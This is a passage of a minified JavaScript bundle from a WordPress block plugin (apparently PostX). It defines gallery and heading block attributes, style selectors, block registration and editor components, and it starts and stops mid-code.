}"}]},imgSize:{type:"string",default:"full"},clickEvent:{type:"string",default:""},lazyLoading:{type:"boolean",default:!1},glImgHeight:{type:"object",default:{lg:"400"},style:[{depends:[{key:"galleryType",condition:"!=",value:"masonry"}],selector:"{{ULTP}} .ultp-gallery-item { height: {{glImgHeight}}px;  } {{ULTP}} .ultp-gallery-container { --ultp-gallery-height: {{glImgHeight}}; } "}]},captionEnable:{type:"boolean",default:!1},captionPosition:{type:"string",default:"bottom"},captionDisplayType:{type:"string",default:"visible"},captionAlignment:{type:"string",default:"center",style:[{depends:[{key:"captionAlignment",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-gallery-media__caption { justify-content: flex-start; }"},{depends:[{key:"captionAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-gallery-media__caption { justify-content: center; }"},{depends:[{key:"captionAlignment",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-gallery-media__caption { justify-content: flex-end; }"}]},enableLightBoxOnImg:{type:"boolean",default:!1},displayImageCount:{type:"object",default:{lg:"1"}},displayCaption:{type:"boolean",default:!1},displayThumbnail:{type:"boolean",default:!0},filterEnable:{type:"boolean",default:!1},enableAllText:{type:"boolean",default:!0},allText:{type:"string",default:"All"},defaultSelectedFilter:{type:"string",default:""},notFoundContent:{type:"string",default:"Image Not Found! Try Again"},enableLoadMore:{type:"boolean",default:!0},loadMoreText:{type:"string",default:"Load More"},postPerPageCount:{type:"object",default:{lg:"9"},style:[{depends:[{key:"enableLoadMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-gallery-loadMore { --ultp-gallery-count: {{postPerPageCount}}; }"}]},enableLink:{type:"boolean",default:!1},enableLightBox:{type:"boolean",default:!1},enableDownload:{type:"boolean",default:!1},actionPosition:{type:"string",default:"top"},actionDisplayType:{type:"string",default:"onHover"},actionAlignment:{type:"string",default:"left",style:[{depends:[{key:"actionAlignment",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-gallery-action { justify-content: flex-start; }"},{depends:[{key:"actionAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-gallery-action { justify-content: center; }"},{depends:[{key:"actionAlignment",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-gallery-action { justify-content: flex-end; }"}]},imgAnimation:{type:"string",default:""},imgEffect:{type:"string",default:""},imgBorder:{type:"border",default:{openBorder:0,disableColor:!0,width:{top:0,right:0,bottom:0,left:0},type:"solid"},style:[{selector:"{{ULTP}} .ultp-gallery-media__img-container"}]},imgRadius:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-media__img-container, {{ULTP}} .ultp-gallery-media__img-container .ultp-image-block, {{ULTP}} .ultp-gallery-item .ultp-gallery-media { border-radius:{{imgRadius}}; overflow: hidden; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-gallery-item .ultp-gallery-media__img-container"}]},captionTypography:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{selector:"{{ULTP}} .ultp-gallery-media__caption"}]},captionColor:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-gallery-media__caption { color: {{captionColor}}; }"}]},captionOverlayBg:{type:"string",default:"#0000009E",style:[{selector:"{{ULTP}} .ultp-gallery-media__caption { background: {{captionOverlayBg}}; }"}]},captionPadding:{type:"object",default:{lg:{top:13,bottom:13,left:19,right:19,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-gallery-media__caption { padding: {{captionPadding}}; box-sizing: border-box; }"}]},actionIconSize:{type:"object",default:{lg:"14",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-action svg { height: {{actionIconSize}}; width: {{actionIconSize}}; }"}]},actionColor:{type:"string",default:"#000",style:[{selector:"{{ULTP}} .ultp-gallery-action svg { color: {{actionColor}}; }"}]},actionBg:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-gallery-action svg { background: {{actionBg}}; }"}]},actionBorder:{type:"object",default:{openBorder:0,disableColor:!0,width:{top:0,right:0,bottom:0,left:0},type:"solid"},style:[{selector:"{{ULTP}} .ultp-gallery-action svg"}]},actionRadius:{type:"object",default:{lg:"2",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-action svg { border-radius:{{actionRadius}}; }"}]},actionHoverColor:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-gallery-action svg:hover { color: {{actionHoverColor}}; }"}]},actionHoverBg:{type:"string",default:"#037FFF",style:[{selector:"{{ULTP}} .ultp-gallery-action svg:hover { background: {{actionHoverBg}}; }"}]},actionHoverBorder:{type:"object",default:{openBorder:0,disableColor:!0,width:{top:0,right:0,bottom:0,left:0},type:"solid"},style:[{selector:"{{ULTP}} .ultp-gallery-action svg:hover"}]},actionHoverRadius:{type:"object",default:{lg:"2",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-action svg:hover { border-radius:{{actionHoverRadius}}; }"}]},actionPadding:{type:"object",default:{lg:{top:4,bottom:4,left:4,right:4,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-gallery-action svg { padding:{{actionPadding}}; }"}]},actionMargin:{type:"object",default:{lg:{top:20,bottom:0,left:20,right:0,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-gallery-action { padding:{{actionMargin}}; box-sizing: border-box; }"}]},actionSpaceBetween:{type:"object",default:{lg:"4",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-action { gap: {{actionSpaceBetween}}; }"}]},loadMoreTypo:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"16",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{selector:"{{ULTP}} .ultp-gallery-loadMore"}]},loadMoreColor:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-gallery-loadMore { color: {{loadMoreColor}}; }"}]},loadMoreBg:{type:"string",default:"#23374D",style:[{selector:"{{ULTP}} .ultp-gallery-loadMore { background-color: {{loadMoreBg}}; }"}]},loadMoreBorder:{type:"border",default:{openBorder:0,disableColor:!0,width:{top:0,right:0,bottom:0,left:0},type:"solid"},style:[{selector:"{{ULTP}} .ultp-gallery-loadMore"}]},loadMoreRadius:{type:"object",default:{lg:"4",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-loadMore { border-radius:{{loadMoreRadius}}; }"}]},loadMoreHoverColor:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-gallery-loadMore:hover { color: {{loadMoreHoverColor}}; }"}]},loadMoreHoverBg:{type:"string",default:"#1089FF",style:[{selector:"{{ULTP}} .ultp-gallery-loadMore:hover { background-color: {{loadMoreHoverBg}}; }"}]},loadMoreHoverBorder:{type:"border",default:{openBorder:0,disableColor:!0,width:{top:0,right:0,bottom:0,left:0},type:"solid"},style:[{selector:"{{ULTP}} .ultp-gallery-loadMore"}]},loadMoreHoverRadius:{type:"object",default:{lg:"4",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-loadMore:hover { border-radius:{{loadMoreHoverRadius}}; }"}]},loadMorePadding:{type:"object",default:{lg:{top:13,bottom:13,left:32,right:32,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-gallery-loadMore { padding: {{loadMorePadding}}; box-sizing: border-box; }"}]},loadMoreSpacing:{type:"object",default:{lg:"58",unit:"px"},style:[{selector:"{{ULTP}}  .ultp-gallery-loadMore { margin-top:{{loadMoreSpacing}};}"}]},filterTypography:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"16",unit:"px"},decoration:"none",transform:"Capitalize",family:"",weight:"500"},style:[{selector:"{{ULTP}} .ultp-gallery-filter__item"}]},filterColor:{type:"string",default:"#1089FF",style:[{selector:"{{ULTP}} .ultp-gallery-filter__item { color: {{filterColor}}; }"}]},filterBg:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-gallery-filter__item { background: {{filterBg}}; }"}]},filterBorder:{type:"border",default:{openBorder:1,disableColor:!0,width:{top:1,right:1,bottom:1,left:1},type:"solid",color:"#1089FF"},style:[{selector:"{{ULTP}} .ultp-gallery-filter__item"}]},filterRadius:{type:"object",default:{lg:"40",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-filter__item { border-radius:{{filterRadius}} }"}]},filterShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-gallery-filter__item"}]},filterHoverColor:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-gallery-filter__item:hover, {{ULTP}} .ultp-gallery-filter__item.active-gallery-filter { color: {{filterHoverColor}}; }"}]},filterHoverBg:{type:"string",default:"#1089FF",style:[{selector:"{{ULTP}} .ultp-gallery-filter__item:hover, {{ULTP}} .ultp-gallery-filter__item.active-gallery-filter { background: {{filterHoverBg}}; }"}]},filterHoverBorder:{type:"border",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},type:"solid",color:"#1089FF"},style:[{selector:"{{ULTP}} .ultp-gallery-filter__item:hover, {{ULTP}} .ultp-gallery-filter__item.active-gallery-filter"}]},filterHoverRadius:{type:"object",default:{lg:"40",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-filter__item:hover, {{ULTP}} .ultp-gallery-filter__item.active-gallery-filter { border-radius:{{filterHoverRadius}} }"}]},filterHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-gallery-filter__item:hover, {{ULTP}} .ultp-gallery-filter__item.active-gallery-filter"}]},filterPadding:{type:"object",default:{lg:{top:10,bottom:10,left:24,right:24,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-gallery-filter__item { padding: {{filterPadding}}; box-sizing: border-box; }"}]},filterMargin:{type:"object",default:{lg:{top:0,bottom:40,left:0,right:0,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-gallery-filter { margin: {{filterMargin}}; }"}]},filterGap:{type:"object",default:{lg:"16",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-filter { gap: {{filterGap}}; }"}]},filterAlignment:{type:"string",default:"center",style:[{depends:[{key:"filterAlignment",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-gallery-filter { justify-content: flex-start; }"},{depends:[{key:"filterAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-gallery-filter { justify-content: center; }"},{depends:[{key:"filterAlignment",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-gallery-filter { justify-content: flex-end; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-wrapper {z-index: {{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},77794:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(35343),n=l(82110),r=l(50315),s=l(83408);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks,c=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/postx-gallery-block/","block_docs");p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/gallery.svg",alt:"PostX Gallery"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Display images with the ultimate controls.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:c},__("Documentation","ultimate-post"))),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/gallery.svg"}},edit:i.Z,save:n.Z})},58065:(e,t,l)=>{"use strict";l.d(t,{Z:()=>y});var o=l(67294),a=l(53049),i=l(99838),n=l(92637),r=l(25335);const{__}=wp.i18n,{InspectorControls:s,useBlockProps:p}=wp.blockEditor,{useEffect:c,useState:u,Fragment:d}=wp.element,{getBlockAttributes:m,getBlockRootClientId:g}=wp.data.select("core/block-editor");function y(e){const[t,l]=u("Content"),{setAttributes:y,name:b,attributes:v,clientId:h,className:f,attributes:{blockId:k,advanceId:w,headingText:x,headingStyle:T,headingAlign:_,headingURL:C,headingBtnText:E,subHeadingShow:S,subHeadingText:P,headingTag:L,dcEnabled:I,dcText:B,currentPostId:U}}=e;c((()=>{const e=h.substr(0,6),t=m(g(h));(0,a.qi)(y,t,U,h),k?k&&k!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||y({blockId:e})):y({blockId:e})}),[h]);const M={setAttributes:y,name:b,attributes:v,setSection:l,section:t,clientId:h};let A;k&&(A=(0,i.Kh)(v,"ultimate-post/heading",k,(0,a.k0)()));const H=p({...w&&{id:w},className:`ultp-block-${k} ${f}`});return(0,o.createElement)(d,null,(0,o.createElement)(s,null,(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.Wh,{include:[{position:6,data:{type:"toggle",key:"openInTab",label:__("Links Open in New Tabs","ultimate-post")}}],initialOpen:!0,store:M})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:M}),(0,o.createElement)(a.Mg,{store:M}),(0,o.createElement)(a.iv,{store:M}))),(0,a.dH)()),(0,o.createElement)("div",H,A&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:A}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)(r.Z,{props:{headingShow:!0,headingStyle:T,headingAlign:_,headingURL:C,headingText:x,setAttributes:y,headingBtnText:E,subHeadingShow:S,subHeadingText:P,headingTag:L,dcEnabled:I,dcText:B}}))))}},6534:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(92165);const a={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},headingText:{type:"string",default:"This is a Heading Example"},headingURL:{type:"string",default:""},openInTab:{type:"boolean",default:!1},headingBtnText:{type:"string",default:"View More",style:[{depends:[{key:"headingStyle",condition:"==",value:"style11"}]}]},headingStyle:{type:"string",default:"style9"},headingTag:{type:"string",default:"h2"},headingAlign:{type:"string",default:"left",style:[{depends:[{key:"headingAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-heading-inner,\n          {{ULTP}} .ultp-sub-heading-inner{ text-align:{{headingAlign}}; margin-right: auto !important; }"},{depends:[{key:"headingAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-heading-inner, \n          {{ULTP}} .ultp-sub-heading-inner { text-align:{{headingAlign}}; margin-left: auto !important; margin-right: auto !important; }"},{depends:[{key:"headingAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-heading-inner,\n          {{ULTP}} .ultp-sub-heading-inner { text-align:{{headingAlign}}; margin-left: auto !important;}"}]},headingTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:"700"},style:[{selector:"{{ULTP}} .ultp-heading-wrap .ultp-heading-inner, {{ULTP}} .ultp-heading-wrap .ultp-heading-inner a"}]},headingColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-heading-inner span { color:{{headingColor}}; }"}]},headingBorderBottomColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner { border-bottom-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-heading-inner { border-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-heading-inner span:before { background-color: {{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-heading-inner span:before, \n          {{ULTP}} .ultp-heading-inner span:after { background-color: {{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style10"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner { border-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style14"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style15"}],selector:"{{ULTP}} .ultp-heading-inner span:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style16"}],selector:"{{ULTP}} .ultp-heading-inner span:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style17"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style19"}],selector:"{{ULTP}} .ultp-heading-inner:before { border-color:{{headingBorderBottomColor}}; }"}]},headingBorderBottomColor2:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor2}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style10"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor2}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style14"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor2}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style19"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor2}}; }"}]},headingBg:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-heading-style5 .ultp-heading-inner span:before { border-color:{{headingBg}} transparent transparent; } \n          {{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style12"}],selector:"{{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style20"}],selector:"{{ULTP}} .ultp-heading-inner span:before { border-color:{{headingBg}} transparent transparent; } \n          {{ULTP}} .ultp-heading-inner { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style21"}],selector:"{{ULTP}} .ultp-heading-inner span, \n          {{ULTP}} .ultp-heading-inner span:after { background-color:{{headingBg}}; }"}]},headingBg2:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style12"}],selector:"{{ULTP}} .ultp-heading-inner { background-color:{{headingBg2}}; }"}]},headingBtnTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"headingStyle",condition:"==",value:"style11"}],selector:"{{ULTP}} .ultp-heading-wrap .ultp-heading-btn"}]},headingBtnColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style11"}],selector:"{{ULTP}} .ultp-heading-wrap .ultp-heading-btn { color:{{headingBtnColor}}; } \n          {{ULTP}} .ultp-heading-wrap .ultp-heading-btn svg { color:{{headingBtnColor}}; }"}]},headingBtnHoverColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style11"}],selector:"{{ULTP}} .ultp-heading-wrap .ultp-heading-btn:hover { color:{{headingBtnHoverColor}}; } \n          {{ULTP}} .ultp-heading-wrap .ultp-heading-btn:hover svg { color:{{headingBtnHoverColor}}; }"}]},headingBorder:{type:"string",default:"3",style:[{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner { border-bottom-width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-heading-inner { border-width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-heading-inner span:before { width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-heading-inner span:before, \n          {{ULTP}} .ultp-heading-inner span:after { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-heading-inner:before, \n          {{ULTP}} .ultp-heading-inner:after { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-heading-inner:before { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style10"}],selector:"{{ULTP}} .ultp-heading-inner:before, \n          {{ULTP}} .ultp-heading-inner:after { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner { border-width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style14"}],selector:"{{ULTP}} .ultp-heading-inner:before, \n          {{ULTP}} .ultp-heading-inner:after { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style15"}],selector:"{{ULTP}} .ultp-heading-inner span:before { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style16"}],selector:"{{ULTP}} .ultp-heading-inner span:before { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style17"}],selector:"{{ULTP}} .ultp-heading-inner:before { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style19"}],selector:"{{ULTP}} .ultp-heading-inner:after { width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner:after { width:{{headingBorder}}px; }"}]},headingSpacing:{type:"object",default:{lg:20,sm:10,unit:"px"},style:[{selector:"{{ULTP}} .ultp-heading-wrap { margin-top:0; margin-bottom:{{headingSpacing}}; }"}]},headingRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"headingStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-heading-inner span { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner span { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-heading-inner span { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style12"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style20"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"}]},headingPadding:{type:"object",default:{lg:{unit:"px"}},style:[{depends:[{key:"headingStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style12"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style19"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style20"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style21"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"}]},subHeadingShow:{type:"boolean",default:!1},subHeadingText:{type:"string",default:"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer ut sem augue. Sed at felis ut enim dignissim sodales.",style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}]}]},subHeadingTypo:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"27",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sub-heading div"}]},subHeadingColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sub-heading div { color:{{subHeadingColor}}; }"}]},subHeadingSpacing:{type:"object",default:{lg:{top:"8",unit:"px"}},style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sub-heading-inner { margin:{{subHeadingSpacing}}; }"}]},enableWidth:{type:"toggle",default:!1,style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}]}]},customWidth:{type:"object",default:{lg:{top:"",unit:"px"}},style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0},{key:"enableWidth",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sub-heading-inner { max-width:{{customWidth}}; }"}]},...l(69735).KF,...(0,o.t)(["advanceAttr"],["loadingColor"])}},58910:(e,t,l)=>{"use strict";var o=l(67294),a=l(58065),i=l(6534),n=l(19209);const{__}=wp.i18n,{registerBlockType:r,createBlock:s}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/heading.svg",alt:"Heading"}),attributes:i.Z,transforms:{from:[{type:"block",blocks:["core/heading","core/paragraph"],transform:e=>s("ultimate-post/heading",{headingText:e?.content})}]},edit:a.Z,save:()=>null})},57283:(e,t,l)=>{"use strict";l.d(t,{Z:()=>b});var o=l(67294),a=l(53049),i=l(99838),n=l(9790);const{__}=wp.i18n,{InspectorControls:r,RichText:s,useBlockProps:p}=wp.blockEditor,{useState:c,useEffect:u,Fragment:d}=wp.element,{Spinner:m}=wp.components,{getBlockAttributes:g,getBlockRootClientId:y}=wp.data.select("core/block-editor");function b(e){const[t,l]=c("Content"),[b,v]=c({device:"lg",setDevice:"",postsList:[],loading:!1,error:!1,section:"Content"}),{setAttributes:h,name:f,clientId:k,attributes:w,className:x,attributes:{previewImg:T,blockId:_,advanceId:C,headingText:E,imageUpload:S,imgLink:P,imgAlt:L,imgOverlay:I,imgOverlayType:B,imgAnimation:U,headingColor:M,headingTypo:A,headingEnable:H,headingMargin:N,linkTarget:j,alignment:Z,btnLink:O,btnText:R,btnTarget:D,btnPosition:z,linkType:F,darkImgEnable:W,darkImage:V,imgCrop:G,dcEnabled:q,currentPostId:$}}=e;u((()=>{const e=k.substr(0,6),t=g(y(k));(0,a.qi)(h,t,$,k),_?_&&_!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||h({blockId:e})):h({blockId:e})}),[k]);const K=S?.size&&S?.size[G]?S?.size[G]?.url?S?.size[G]?.url:S?.size[G]:S.url?S.url:ultp_data.url+"assets/img/ultp-placeholder.jpg";let 